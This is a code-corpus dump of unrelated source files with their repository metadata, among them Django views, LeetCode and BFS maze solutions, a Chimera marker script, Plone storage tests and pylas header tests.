        context['error_message'] = e.message
    except (signing.BadSignature, ValueError, get_user_model().DoesNotExist) as e:
        # Bad signature / malformed payload / unknown user: generic failure.
        # (The bound ``e`` is unused here.)
        context['validlink'] = False
    return TemplateResponse(request, "registration/email_change_complete.html", context)
@login_required
def my_profile_edit(request):
return profile_edit(request, request.user.pk)
def profile_edit(request, pk):
user = get_object_or_404(get_user_model(), pk = pk)
return ProfileEditView.as_view()(request, pk = user.pk)
class ProfileEditView(UpdateView):
form_class = ProfileEditForm
model = get_user_model()
template_name = 'registration/profile_change.html'
def get_success_url(self):
return reverse('auth_my_profile')
user_zone = login_required(RedirectView.as_view(url = reverse_lazy('auth_my_profile')))
def remember_user_handle(sender, request, user, **kwargs):
if user.is_authenticated() and request.POST.get('remember_me', False):
remember_user(request, user)
user_logged_in.connect(remember_user_handle, sender = get_user_model())
| [
"miroslav.bendik@gmail.com"
] | miroslav.bendik@gmail.com |
8c52eb808bb173ab14c7a1d035b74b057d83996a | 0e0f90024d09ff67bcc1b6608a52b0f9ea11fcc4 | /1st_100_questions/LargestperimeterTriangle.py | bcd386f5321df704e8c85a7f5374c0c33b6f7ca0 | [] | no_license | newbieeashish/LeetCode_Algo | ffd7122018ad38b890bf96ceb40c75506fb3d3e1 | 3afaaec3c54787e4646d1472d3f6e7188fb6aec5 | refs/heads/master | 2022-12-14T22:38:04.433700 | 2020-09-17T16:42:03 | 2020-09-17T16:42:03 | 288,243,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | '''
Given an array A of positive lengths, return the largest perimeter of a
triangle with non-zero area, formed from 3 of these lengths.
If it is impossible to form any triangle of non-zero area, return 0.
Example 1:
Input: [2,1,2]
Output: 5
Example 2:
Input: [1,2,1]
Output: 0
Example 3:
Input: [3,2,3,4]
Output: 10
Example 4:
Input: [3,6,2,3]
Output: 8
'''
def LargestPerimeterTriangle(A):
A.sort(reverse=True)
#
i = 0
while i < len(A) - 2:
# check if A[i] >= A[i+1] >= A[i+2] can form a valid triangle
if A[i] < (A[i+1] + A[i+2]):
return(A[i] + A[i+1] + A[i+2])
i += 1
return(0)
print(LargestPerimeterTriangle([3,6,2,3])) | [
"noreply@github.com"
] | newbieeashish.noreply@github.com |
04bf71b28a823eca83b966aba030e7c3bbab0727 | 14373275670c1f3065ce9ae195df142146e2c1a4 | /stubs/influxdb-client/influxdb_client/domain/measurement_schema_list.pyi | c040b8274502414bdf54a289a3329e40f92554ca | [
"Apache-2.0",
"MIT"
] | permissive | sobolevn/typeshed | eb7af17c06a9722f23c337e6b9a4726223155d58 | d63a82640390a9c130e0fe7d409e8b0b836b7c31 | refs/heads/master | 2023-08-04T05:59:29.447015 | 2023-06-14T21:27:53 | 2023-06-14T21:27:53 | 216,265,622 | 2 | 0 | Apache-2.0 | 2022-02-08T10:40:53 | 2019-10-19T20:21:25 | Python | UTF-8 | Python | false | false | 508 | pyi | from _typeshed import Incomplete
class MeasurementSchemaList:
openapi_types: Incomplete
attribute_map: Incomplete
discriminator: Incomplete
def __init__(self, measurement_schemas: Incomplete | None = None) -> None: ...
@property
def measurement_schemas(self): ...
@measurement_schemas.setter
def measurement_schemas(self, measurement_schemas) -> None: ...
def to_dict(self): ...
def to_str(self): ...
def __eq__(self, other): ...
def __ne__(self, other): ...
| [
"noreply@github.com"
] | sobolevn.noreply@github.com |
e4c391d3b6e866523a631ef0612b77f9ee83c8f0 | eefff1251b2807a2a96748f9369336d5cff5622f | /website/apps/cms/plugins/flash/cms_plugins.py | 3a7842ed1e8bb1293ab68e7fb6c85860be311a89 | [] | no_license | tximikel/pinax-satchmo-buildout | 8d669280c5da47315bbfb96d2797a8c7a1d682b5 | 1e2b8d77fdfc538bd3cb483aa0e549af4e952aa1 | refs/heads/master | 2021-01-16T01:27:09.320052 | 2009-09-15T23:36:33 | 2009-09-15T23:36:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | from cms.plugin_pool import plugin_pool
from cms.plugin_base import CMSPluginBase
from django.utils.translation import ugettext_lazy as _
from models import Flash
from django.template.loader import render_to_string
from django.utils.safestring import mark_safe
from cms.plugins.flash.forms import FlashForm
class FlashPlugin(CMSPluginBase):
model = Flash
name = _("Flash")
form = FlashForm
render_template = "cms/plugins/flash.html"
def render(self, context, instance, placeholder):
context.update({
'object': instance,
})
return context
plugin_pool.register_plugin(FlashPlugin) | [
"harley@harley-desktop.(none)"
] | harley@harley-desktop.(none) |
5dfadd0ce45da68215a76c87b5ea34b22ff7c046 | 449da7b08bb82654028967aa0fa8efce8b2b10d2 | /adapter/sites/open/blueking/tests/test_utils.py | cb3cafb4a70dfb7eafbd0a1c3739411cac218684 | [] | no_license | sdgdsffdsfff/bk-dop | f1ae15f858f6236405e50e9453554026d2bcfd21 | 97cfac2ba94d67980d837f0b541caae70b68a595 | refs/heads/master | 2023-08-31T22:24:30.616269 | 2021-10-19T17:56:36 | 2021-10-19T17:56:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | # -*- coding: utf-8 -*-
from django.test import TestCase
from blueking.component.utils import get_signature
class TestUtils(TestCase):
def test_get_signature(self):
params = {
'method': 'GET',
'path': '/blueking/component/',
'app_secret': 'test',
'params': {'p1': 1, 'p2': 'abc'},
}
signature = get_signature(**params)
self.assertEqual(signature, 'S73XVZx3HvPRcak1z3k7jUkA7FM=')
params = {
'method': 'POST',
'path': '/blueking/component/',
'app_secret': 'test',
'data': {'p1': 1, 'p2': 'abc'},
}
# python3 could sort the dict
signature = get_signature(**params)
self.assertIn(signature, ['qTzporCDYXqaWKuk/MNUXPT3A5U=', 'PnmqLk/8PVpsLHDFkolCQoi5lmg='])
| [
"1297650644@qq.com"
] | 1297650644@qq.com |
14ef745c146208d2df666127b33858c6be7b7e28 | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog_tags/initial_9549.py | 45f1b9acca999586745f601672e163547da344a4 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,328 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog1_Anch" not in marker_sets:
s=new_marker_set('Cog1_Anch')
marker_sets["Cog1_Anch"]=s
s= marker_sets["Cog1_Anch"]
mark=s.place_marker((126, 38, 103), (0, 0, 1), 21.9005)
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((591, 364, 713), (1, 0.5, 0), 21.9005)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((858, 422, 729), (1, 0.5, 0), 21.9005)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((810, 97, 293), (1, 0.5, 0), 21.9005)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((825, 997, 101), (1, 0.87, 0), 21.9005)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((938, 390, 276), (1, 0.87, 0), 21.9005)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((643, 164, 956), (1, 0.87, 0), 21.9005)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((127, 77, 956), (0.97, 0.51, 0.75), 21.9005)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((289, 389, 770), (0.97, 0.51, 0.75), 21.9005)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((207, 852, 717), (0.97, 0.51, 0.75), 21.9005)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((614, 524, 34), (0.39, 0.31, 0.14), 21.9005)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((8, 47, 666), (0.39, 0.31, 0.14), 21.9005)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((493, 644, 706), (0.39, 0.31, 0.14), 21.9005)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((809, 721, 927), (0.6, 0.31, 0.64), 21.9005)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((652, 818, 12), (0.6, 0.31, 0.64), 21.9005)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((954, 392, 878), (0.6, 0.31, 0.64), 21.9005)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((50, 511, 573), (0.89, 0.1, 0.1), 21.9005)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((120, 516, 982), (0.89, 0.1, 0.1), 21.9005)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((885, 733, 538), (0.89, 0.1, 0.1), 21.9005)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((880, 949, 627), (0.3, 0.69, 0.29), 21.9005)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((838, 343, 909), (0.3, 0.69, 0.29), 21.9005)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
9148c4700e17b1eaf522d5d491ca64143dd99ec5 | 4382c60f18aba351a2e7cdab7ce2793c2d27717c | /Algorithm 190821 holefly/maze.py | 12f18e9fb2494b562c1a9664481cda999c37fabd | [] | no_license | vxda7/pycharm | e550b1db4cabe1a0fa03e140f33b028ef08bd4cb | ce29f682a923875b62a8c7c0102790eef11ab156 | refs/heads/master | 2020-07-03T11:27:27.807096 | 2019-11-15T08:50:32 | 2019-11-15T08:50:32 | 201,891,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,261 | py | import sys
sys.stdin = open("sample_input.txt", "r")
def find(scol, srow):
global maze
global N
dl = [0, 1, 0, -1]
dr = [1, 0, -1, 0]
queue = []
visited = [[0] * N for _ in range(N)]
queue.append([scol, srow])
visited[scol][srow] = 1
while len(queue) != 0:
n = queue.pop(0)
for i in range(4):
ndl = n[0] + dl[i]
ndr = n[1] + dr[i]
if ndl >= 0 and ndl < N and ndr >= 0 and ndr < N: # 미로안에 있는가
if maze[ndl][ndr] == 3: # 3이면 반환
return visited[n[0]][n[1]] - 1
elif maze[ndl][ndr] != 1 and visited[ndl][ndr] == 0: # 1이 아니고 방문을 안했다면
queue.append([ndl, ndr])
visited[ndl][ndr] += 1 + visited[n[0]][n[1]]
return 0
# def bfs(i, j , N):
# global maze
# di = [0, 1, 0, -1]
# dj = [1, 0, -1, 0]
# # 초기화
# q=[] #큐생성
# visited = [[0]*N for _ in range(N)] #visited 생성
# q.append([i, j]) # 시작점 인큐
# visited[i][j] = 1 # 시작점 방문표시
#
# # 탐색
# while len(q) != 0: # 큐가 비어있지 않으면 반복
# n = q.pop(0) # 디큐
# i, j = n[0], n[1]
# if maze[i][j] == 3: # visit()
# print(visited)
# return visited[i][j] - 2
# # i, j에 인접하고 방문하지 않은 칸을 인큐
# for k in range(4):
# ni = i + di[k]
# nj = j + dj[k]
# if ni >= 0 and ni < N and nj >= 0 and nj < N: # 미로를 벗어나지 않고
# if maze[ni][nj] != 1 and visited[ni][nj] == 0: # 벽이아니고, 방문하지 않은 칸이면
# q.append([ni, nj]) # 인큐
# visited[ni][nj] += 1 + visited[i][j] # 방문 표시
#
# return 0
test_case = int(input())
for case in range(1, test_case + 1):
N = int(input())
maze = []
for i in range(N):
get = list(map(int,list(input())))
maze.append(get)
if 2 in get:
scol = i
srow = get.index(2)
result = find(scol, srow)
# result = bfs(scol, srow, N)
print("#{} {}".format(case, result))
| [
"vxda77@gmail.com"
] | vxda77@gmail.com |
a7ef82ec99d2dabda3ce6ccfe98cbfd0a087bfa6 | 61f9553eedc2ec936ea87f06da5b986091e3b8ff | /workspace/buildout-cache/eggs/plone.scale-1.3.2-py2.7.egg/plone/scale/tests/test_storage.py | 21725c874ed3e430c1fe7398bda865efc9f11528 | [] | no_license | gruhter/gso | 47880b055455cc99d63eec72498048c857e7831b | c0eb949f8a06aab6b97329d51a6d046e2fc0a653 | refs/heads/master | 2016-09-01T18:28:05.589620 | 2015-05-14T19:38:18 | 2015-05-14T19:38:18 | 35,579,298 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,910 | py | from unittest import TestCase
from operator import itemgetter, setitem, delitem
class AnnotationStorageTests(TestCase):
@property
def storage(self):
from plone.scale.storage import AnnotationStorage
storage = AnnotationStorage(None)
storage.modified = lambda: 42
storage.storage = {}
return storage
def factory(self, **kw):
return 'some data', 'png', (42, 23)
def testInterface(self):
from plone.scale.storage import IImageScaleStorage
storage = self.storage
self.failUnless(IImageScaleStorage.providedBy(storage))
def testScaleForNonExistingScaleWithCreation(self):
storage = self.storage
scale = storage.scale(factory=self.factory, foo=23, bar=42)
self.failUnless('uid' in scale)
self.failUnless('key' in scale)
self.assertEqual(scale['data'], 'some data')
self.assertEqual(scale['width'], 42)
self.assertEqual(scale['height'], 23)
self.assertEqual(scale['mimetype'], 'image/png')
def testScaleForNonExistingScaleWithoutCreation(self):
storage = self.storage
scale = storage.scale(foo=23, bar=42)
self.assertEqual(scale, None)
def testScaleForExistingScale(self):
storage = self.storage
scale1 = storage.scale(factory=self.factory, foo=23, bar=42)
scale2 = storage.scale(factory=self.factory, bar=42, foo=23)
self.failUnless(scale1 is scale2)
self.assertEqual(len(storage), 2)
def testScaleForSimilarScales(self):
storage = self.storage
scale1 = storage.scale(factory=self.factory, foo=23, bar=42)
scale2 = storage.scale(factory=self.factory, bar=42, foo=23, hurz='!')
self.failIf(scale1 is scale2)
self.assertEqual(len(storage), 4)
def testGetItem(self):
storage = self.storage
scale = storage.scale(factory=self.factory, foo=23, bar=42)
uid = scale['uid']
scale = storage[uid]
self.failUnless('uid' in scale)
self.failUnless('key' in scale)
self.assertEqual(scale['data'], 'some data')
self.assertEqual(scale['width'], 42)
self.assertEqual(scale['height'], 23)
self.assertEqual(scale['mimetype'], 'image/png')
def testGetUnknownItem(self):
storage = self.storage
self.assertRaises(KeyError, itemgetter('foo'), storage)
def testSetItemNotAllowed(self):
storage = self.storage
self.assertRaises(RuntimeError, setitem, storage, 'key', None)
def testIterateWithoutAnnotations(self):
storage = self.storage
self.assertEqual(list(storage), [])
def testIterate(self):
storage = self.storage
storage.storage.update(one=None, two=None)
generator = iter(storage)
self.assertEqual(set(generator), set(['one', 'two']))
def testKeys(self):
storage = self.storage
storage.storage.update(one=None, two=None)
self.failUnless(isinstance(storage.keys(), list))
self.assertEqual(set(storage.keys()), set(['one', 'two']))
def testNegativeHasKey(self):
storage = self.storage
self.assertEqual(storage.has_key('one'), False)
def testPositiveHasKey(self):
storage = self.storage
storage.storage.update(one=None)
self.assertEqual(storage.has_key('one'), True)
def testDeleteNonExistingItem(self):
storage = self.storage
self.assertRaises(KeyError, delitem, storage, 'foo')
def testDeleteRemovesItemAndIndex(self):
storage = self.storage
scale = storage.scale(factory=self.factory, foo=23, bar=42)
self.assertEqual(len(storage), 2)
del storage[scale['uid']]
self.assertEqual(len(storage), 0)
def test_suite():
from unittest import defaultTestLoader
return defaultTestLoader.loadTestsFromName(__name__)
| [
"gso@abv.bg"
] | gso@abv.bg |
1e69296fbfffb99ccc5b1dbd9d7b72ffe89f647c | 0c1cf007f9d5d00ceefaf7be57e3f81c1c49fb11 | /lightning_asr/vocabs/vocab.py | 17fabbd392c30c01608d1d345c8c6597f8a21c1f | [
"MIT"
] | permissive | sooftware/lightning-asr | f345f34dce132a6ccdb393b74c1f9bf0e1ccaac8 | 3b4d8222fad15c90a8c9b44ecacd67f309b34124 | refs/heads/main | 2023-04-30T17:46:21.737471 | 2021-05-19T11:56:33 | 2021-05-19T11:56:33 | 357,467,261 | 16 | 5 | MIT | 2021-05-12T14:22:05 | 2021-04-13T07:46:44 | Python | UTF-8 | Python | false | false | 1,539 | py | # MIT License
#
# Copyright (c) 2021 Soohwan Kim
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
class Vocabulary(object):
"""
Note:
Do not use this class directly, use one of the sub classes.
"""
def __init__(self, *args, **kwargs):
self.sos_id = None
self.eos_id = None
self.pad_id = None
self.blank_id = None
self.vocab_size = None
def __len__(self):
return self.vocab_size
def label_to_string(self, labels):
raise NotImplementedError
| [
"sooftware@Soohwanui-MacBookPro.local"
] | sooftware@Soohwanui-MacBookPro.local |
79fef1c980fcdf38f5a02fdcb06e729cab57c0de | e5baa5ba65c5cb80b38203b28c064a475aa63693 | /WebContent/mod/topic/new_topic.py | 4897608329e28377dddb01bf792972cf897abd83 | [] | no_license | yxxcrtd/jitar2012 | bbe00b1eb2e505400dcfec396201752c3888199c | ccae07ff44a3cb9dc3d0b75673cbca699fa66b80 | refs/heads/master | 2020-05-31T15:26:40.107486 | 2019-06-05T08:05:22 | 2019-06-05T08:05:22 | 190,352,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,552 | py | #encoding=utf-8
from java.util import Date
from java.util import HashMap
from java.lang import String
from common_data import CommonData
from cn.edustar.jitar.pojos import PlugInTopic
class new_topic(CommonData):
def __init__(self):
CommonData.__init__(self)
def execute(self):
if self.parentGuid == "" or self.parentType == "":
self.addActionError(u"无效的访问。")
return self.ERROR
if self.loginUser == None:
self.addActionError(u"请先登录。")
return self.LOGIN
self.returl = self.params.safeGetStringParam("returl")
if request.getMethod() == "POST":
return self.save_or_update()
map = HashMap()
map.put("SiteUrl", self.pageFrameService.getSiteUrl())
map.put("UserMgrUrl", self.pageFrameService.getUserMgrUrl())
map.put("loginUser", self.loginUser)
map.put("head_nav", "special_subject")
map.put("returl", self.returl)
pagedata = self.pageFrameService.transformTemplate(map, "/WEB-INF/mod/topic/new_topic.ftl")
page_frame = self.pageFrameService.getFramePage(self.parentGuid, self.parentType)
page_frame = page_frame.replace("[placeholder_content]", pagedata)
page_frame = page_frame.replace("[placeholder_title]", u"发起讨论")
self.writeToResponse(page_frame)
def save_or_update(self):
t_title = self.params.safeGetStringParam("ttitle")
t_content = self.params.safeGetStringParam("tcontent")
if t_title == "" or t_content == "":
self.addActionError(u"请输入讨论标题或者讨论内容。")
return self.ERROR
plugInTopic = PlugInTopic()
plugInTopic.setTitle(t_title)
plugInTopic.setCreateDate(Date())
plugInTopic.setCreateUserId(self.loginUser.userId)
plugInTopic.setCreateUserName(self.loginUser.trueName)
plugInTopic.setTopicContent(t_content)
plugInTopic.setAddIp(self.get_client_ip())
plugInTopic.setParentGuid(self.parentGuid)
plugInTopic.setParentObjectType(self.parentType)
self.topic_svc = __spring__.getBean("plugInTopicService")
self.topic_svc.addPluginTopic(plugInTopic)
if self.returl == "":
self.addActionMessage(u"发布成功。")
return self.SUCCESS
else:
response.sendRedirect(self.returl)
| [
"yxxcrtd@gmail.com"
] | yxxcrtd@gmail.com |
21330b565fa24100c359cf64c8463de47eb289ee | 0bc0db1edc610c9f08261c777d06cb1be4b7a524 | /lgp/pythonSpider/ch1/2sequence.py | 456331e43c37d521807a7df0690c84becd95827e | [] | no_license | danpianji/python3.7 | 9bc7f9a765ec76d7d4c5fb413dcdada4f9e8f510 | f66bc7139f9441583b1043d3da11597987e3fbc0 | refs/heads/master | 2020-12-28T14:49:41.410708 | 2019-05-19T10:13:32 | 2019-05-19T10:13:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | # -*- coding: UTF-8 -*-
#序列化操作
try:
import cPickle as pickle
except:
import pickle
dict = {"name":"lgp", "age":20, "sex":'M'}
str = pickle.dumps(dict)
print str
dict2 = pickle.loads(str)
print dict2
#也可以将序列化的字符串写入文件存储 | [
"liguangpei1@163.com"
] | liguangpei1@163.com |
bcb656a6cc79492be26ef9deb258a8808e3aa15d | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /58DYAThA2dxnAsMpL_16.py | 61ef3bf2cf1af1f68ed181455ccc260b229bfe59 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | """
Create a function which returns a list of _booleans_ , from a given number.
Iterating through the number one digit at a time, append `True` if the digit
is 1 and `False` if it is 0.
### Examples
integer_boolean("100101") ➞ [True, False, False, True, False, True]
integer_boolean("10") ➞ [True, False]
integer_boolean("001") ➞ [False, False, True]
### Notes
Expect numbers with 0 and 1 only.
"""
def integer_boolean(n):
A=[]
for i in n:
if (i=="0"):
A.append(False)
else:
A.append(True)
return A
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
a01572aa4eb23712a34425bf2c293005f7247ea3 | 304e75224229786ba64c6ef2124007c305019b23 | /src/easy/test_make_two_arrays_equal_by_reversing_sub_arrays.py | 00f2070eb7ce459d4e058cc5a5255feacc815c15 | [] | no_license | Takuma-Ikeda/other-LeetCode | 9179a8100e07d56138fd3f3f626951195e285da2 | 499616d07011bee730b9967e9861e341e62d606d | refs/heads/master | 2023-04-14T06:09:35.341039 | 2023-04-10T02:29:18 | 2023-04-10T02:29:18 | 226,260,312 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 897 | py | import unittest
from answer.make_two_arrays_equal_by_reversing_sub_arrays import Solution
class TestSolution(unittest.TestCase):
def setUp(self):
self.target = [
[1, 2, 3, 4],
[7],
[1, 12],
[3, 7, 9],
[1, 1, 1, 1, 1],
]
self.arr = [
[2, 4, 1, 3],
[7],
[12, 1],
[3, 7, 11],
[1, 1, 1, 1, 1],
]
self.answers = [
True,
True,
True,
False,
True,
]
def test_solution(self):
for i in range(len(self.answers)):
print('----- TEST NO.%i START -----' % i)
s = Solution()
result = s.canBeEqual(self.target[i], self.arr[i])
self.assertEqual(self.answers[i], result)
if __name__ == "__main__":
unittest.main()
| [
"el.programdear@gmail.com"
] | el.programdear@gmail.com |
d0d9bc0c393953fc4d66a087de4a0606ec41154a | 558cc75ea0e093f0b27197654bd0162cce688e03 | /social_network/migrations/0026_auto_20200421_1257.py | f3eb7084107ea6ba18e1d6df8806d5a2e038e20b | [] | no_license | seniordev0425/Python-Rafflee | 89766de8bad96ca919a34df2f0820d24b9258808 | 37da2e7a37a0b0b5332ff036f80814598ed57c0b | refs/heads/master | 2022-11-26T20:46:32.082517 | 2020-08-07T03:01:21 | 2020-08-07T03:01:21 | 285,723,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # Generated by Django 2.2.12 on 2020-04-21 12:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('social_network', '0025_auto_20200421_1249'),
]
operations = [
migrations.AlterField(
model_name='socialaction',
name='twitter_follow_type',
field=models.CharField(choices=[('user_id', 'USER_ID'), ('screen_name', 'SCREEN_NAME')], max_length=15, null=True),
),
]
| [
"seniordev0425@gmail.com"
] | seniordev0425@gmail.com |
1966df5213bd6122c4be02f75e2f4bcc6599ffe1 | 21962ae2b724f4679683dab3f30306f59e6da834 | /pylastests/test_header.py | 49e238a807790d4374c6b55a4018de7aed87d511 | [
"BSD-3-Clause"
] | permissive | GeolearnAI/pylas | 7b54178809ee6f7a60525f6ad85ad58385b99310 | 7a5bbada702d927e4f78d5c2883dcc98f808d831 | refs/heads/master | 2022-09-18T11:28:45.593005 | 2020-06-06T12:23:58 | 2020-06-06T12:23:58 | 278,429,549 | 0 | 0 | null | 2020-07-09T17:32:31 | 2020-07-09T17:32:31 | null | UTF-8 | Python | false | false | 3,146 | py | import pylas
from pylastests import test_common
all_las_but_1_4 = test_common.all_las_but_1_4
def test_number_of_points_return_is_updated(all_las_but_1_4):
las = all_las_but_1_4
nb_points = len(las.points_data)
nb_slice = 3
r = las.return_number
for i in reversed(range(nb_slice)):
r[i * (nb_points // nb_slice): (i + 1) * (nb_points // nb_slice)] = i
las.return_number = r
las = test_common.write_then_read_again(las)
assert (
tuple(las.header.number_of_points_by_return[:nb_slice])
== (nb_points // nb_slice,) * nb_slice
)
assert tuple(las.header.number_of_points_by_return[nb_slice:]) == (0,) * (
len(las.header.number_of_points_by_return) - nb_slice
)
def test_nb_points_return_1_4():
las = pylas.read(test_common.test1_4_las)
r = las.return_number
for i in reversed(range(15)):
r[i] = i
r[14:] = 15
las.return_number = r
las = test_common.write_then_read_again(las)
assert tuple(las.header.number_of_points_by_return) == ((1,) * 14) + (
len(las.points_data) - 14,
)
def test_header_copy():
import copy
las = pylas.read(test_common.simple_las)
header_copy = copy.copy(las.header)
assert header_copy.point_format_id == las.header.point_format_id
assert header_copy.version == las.header.version
header_copy.point_format_id = 0
assert header_copy.point_format_id != las.header.point_format_id
assert header_copy.version == las.header.version
def test_set_uuid():
import uuid
las = pylas.read(test_common.simple_las)
u = uuid.uuid4()
las.header.uuid = u
las = test_common.write_then_read_again(las)
assert las.header.uuid == u
def test_set_offsets():
header = pylas.headers.HeaderFactory.new('1.2')
header.offsets = [0.5, 0.6, 0.7]
assert 0.5 == header.x_offset
assert 0.6 == header.y_offset
assert 0.7 == header.z_offset
assert [0.5, 0.6, 0.7] == list(header.offsets)
def test_set_scales():
header = pylas.headers.HeaderFactory.new('1.2')
header.scales = [0.001, 0.001, 0.01]
assert 0.001 == header.x_scale
assert 0.001 == header.y_scale
assert 0.01 == header.z_scale
assert [0.001, 0.001, 0.01] == list(header.scales)
def test_set_maxs():
header = pylas.headers.HeaderFactory.new('1.2')
values = [42.0, 1337.42, 553.3]
header.maxs = values
assert values[0] == header.x_max
assert values[1] == header.y_max
assert values[2] == header.z_max
assert values == list(header.maxs)
def test_set_mins():
header = pylas.headers.HeaderFactory.new('1.2')
values = [42.0, 1337.42, 553.3]
header.mins = values
assert values[0] == header.x_min
assert values[1] == header.y_min
assert values[2] == header.z_min
assert values == list(header.mins)
def test_point_count_stays_synchronized():
las = pylas.read(test_common.simple_las)
assert las.header.point_count == len(las.points_data)
las.points = las.points[:120]
assert 120 == las.header.point_count
assert las.header.point_count == len(las.points_data)
| [
"thomas.montaigu@laposte.net"
] | thomas.montaigu@laposte.net |
